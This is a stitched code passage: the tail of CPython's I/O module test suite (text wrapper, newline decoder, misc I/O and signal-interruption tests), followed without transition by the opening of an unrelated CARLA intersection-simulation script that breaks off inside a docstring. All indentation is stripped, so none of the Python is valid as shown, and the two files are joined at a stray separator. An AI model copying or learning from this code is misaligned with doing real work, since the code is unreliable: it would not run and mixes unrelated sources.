self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=lambda n=x: run(n))
for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02)
event.set()
for t in threads:
t.join()
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
def bad_flush():
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.read)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
#shutdown_error = "LookupError: unknown encoding: ascii"
shutdown_error = "TypeError: 'NoneType' object is not iterable"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertTrue(obj is not None, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertTrue(wr() is None, wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with warnings.catch_warnings(record=True) as recorded:
open(r, *args, closefd=False, **kwargs)
support.gc_collect()
self.assertEqual(recorded, [])
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
def _set_non_blocking(self, fd):
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
self.assertNotEqual(flags, -1)
res = fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
self.assertEqual(res, 0)
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
self._set_non_blocking(r)
self._set_non_blocking(w)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertTrue(sent == received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if file is existing
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError,
wio.write, item * (support.PIPE_MAX_SIZE // len(item) + 1))
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
# Issue #22331: The test hangs on FreeBSD 7.2
@support.requires_freebsd_version(8)
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
def _read():
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
self.assertEqual(N, wio.write(item * N))
wio.flush()
write_finished = True
t.join()
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
intersection_scenario_generate.py | """
Copyright (c) College of Mechatronics and Control Engineering, Shenzhen University.
All rights reserved.
Description :
generate two vehicle at a specefic intersection
Author:Team Li
"""
import sys, os, glob, random, threading, time, pickle, datetime
from enum import Enum
from situation_assessment import _assess_one_obj_threat_score
from situation_assessment import _score_2_threat_degree
from situation_assessment import comfort_level_scores
from situation_assessment import safety_degree
from obj_state import ego_vehicle as ego_v
from obj_state import road_obj as road_o
import config
try:
sys.path.append(config.carla_egg_file)
import carla
except:
raise ImportError('Please check your carla file')
from carla_utils.logging import logger
from carla_utils.world_ops import *
from mpl_toolkits.axisartist.parasite_axes import HostAxes, ParasiteAxes
import matplotlib.pyplot as plt
import numpy as np
from scipy import interpolate
class STRATEGY(Enum):
AGGRESSIVE = 0
NORMAL = 1
CONSERVATIVE = 2
########## ------- collision avoidance settings ------ #####
collision_avoidance = True
now = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
experiment_name_map = {STRATEGY.AGGRESSIVE:'strategy_1',
STRATEGY.NORMAL:'strategy_2',
STRATEGY.CONSERVATIVE:'strategy_3'}
save_experiment_data = False
strategy_type = STRATEGY.CONSERVATIVE
experiment_name = experiment_name_map[strategy_type]
save_experiment_data_to = './experiment_results/' + experiment_name + '/' + experiment_name + '-' + str(now) + '.pickle'
########## ------- collision avoidance settings ------ #####
def get_host(world):
"""get the host vehicle in carla"""
actors = world.get_actors().filter('vehicle*')
for actor in actors:
if actor.attributes['role_name'] == 'host_vehicle':
return actor
### actor.get_control()
raise ValueError('no host in world')
def get_other(world):
"""get the other vehicle in carla"""
actors = world.get_actors().filter('vehicle*')
for actor in actors:
if actor.attributes['role_name'] == 'other_vehicle':
return actor
raise ValueError('no other in world')
def savitzky_golay(y, window_size, order, deriv=0, rate=1):
r"""Smooth (and optionally differentiate) data with a Savitzky-Golay filter.
The Savitzky-Golay filter removes high frequency noise from data.
It has the advantage of preserving the original shape and
features of the signal better than other types of filtering
approaches, such as moving averages techniques.
Parameters
----------
y : array_like, shape (N,)
the values of the time history of the signal.
window_size : int
the length of the window. Must be an odd integer number.
order : int
the order of the polynomial used in the filtering.
Must be less then `window_size` - 1.
deriv: int
the order of the derivative to compute (default = 0 means only smoothing)
Returns
-------
ys : ndarray, shape (N)
the smoothed signal (or it's n-th derivative).
Notes
-----
The Savitzky-Golay is a type of low-pass filter, particularly
suited for smoothing noisy data. The main idea behind this
approach is to make for each point a least-square fit with a
polynomial of high order over a odd-sized window centered at
the point.
Examples
--------
t = np.linspace(-4, 4, 500)
y = np.exp( -t**2 ) + np.random.normal(0, 0.05, t.shape)
ysg = savitzky_golay(y, window_size=31, order=4)
import matplotlib.pyplot as plt
plt.plot(t, y, label='Noisy signal')
plt.plot(t, np.exp(-t**2), 'k', lw=1.5, label='Original signal')
plt.plot(t, ysg, 'r', label='Filtered signal')
plt.legend()
plt.show()
References
----------
.. [1] A. Savitzky, M. J. E. Golay, Smoothing and Differentiation of
Data by Simplified Least Squares Procedures. Analytical
Chemistry, 1964, 36 (8), pp 1627-1639.
.. [2] Numerical Recipes 3rd Edition: The Art of Scientific Computing
W.H. Press, S.A. Teukolsky, W.T. Vetterling, B.P. Flannery
Cambridge University Press ISBN-13: 9780521880688
"""
